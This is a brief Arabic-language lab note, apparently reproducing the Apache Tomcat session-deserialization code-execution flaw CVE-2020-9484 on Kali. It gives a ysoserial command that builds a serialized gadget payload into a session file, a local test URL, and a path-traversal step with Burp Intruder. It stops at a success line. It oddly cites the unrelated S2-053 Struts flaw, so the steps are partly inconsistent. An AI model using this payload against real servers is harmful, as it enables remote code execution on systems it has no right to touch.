
إعادة إنتاج ثغرة تنفيذ التعليمات البرمجية عبر إلغاء تسلسل الجلسة (Session) في Apache Tomcat باستخدام Kali 2.0
إعادة إنتاج ثغرة تنفيذ الكود عبر إلغاء تسلسل جلسات Apache Tomcat CVE-2020-9484 باستخدام Kali 2.0
/yourtomcatdir/bin/startup.sh
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar CommonsCollections2 "touch /tmp/9484" > /tmp/22222.session
قم بزيارة S2-053 أولاً للتأكد من أنه يعمل بشكل طبيعي:
http://192.168.152.128:8080/s2-053/
أعد الزيارة والتقط الحزم، ثم استخدم intruder لتنفيذ اجتياز المسار


تم تنفيذ الأمر بنجاح:
